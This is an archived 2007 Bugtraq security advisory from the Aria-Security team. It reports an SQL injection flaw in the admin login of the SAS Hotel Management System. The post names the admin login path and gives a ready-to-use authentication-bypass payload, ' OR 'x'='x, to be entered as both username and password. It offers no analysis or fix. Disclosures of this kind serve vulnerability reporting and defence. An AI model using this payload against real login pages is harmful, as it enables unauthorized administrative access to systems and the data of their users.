lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: 9 Aug 2007 07:33:56 -0000
From: Advisory@...a-security.net
To: bugtraq@...urityfocus.com
Subject: [Aria-Security.net] SAS Hotel Management System SQL Injection

__________________________

A R I A - S E CU R I T Y  
___________________________

SAS Hotel Management System SQL Injection
http://www.sellatsite.com/sellatsite/hotel.asp


Explanation:

http://path/admin/admin.asp

Username: anything' OR 'x'='x
password: anything' OR 'x'='x



Credits: Aria-Security Team
http://aria-security.net
http://outlaw.Aria-Security.net/ [PERSONAL BLOG]

Powered by blists - more mailing lists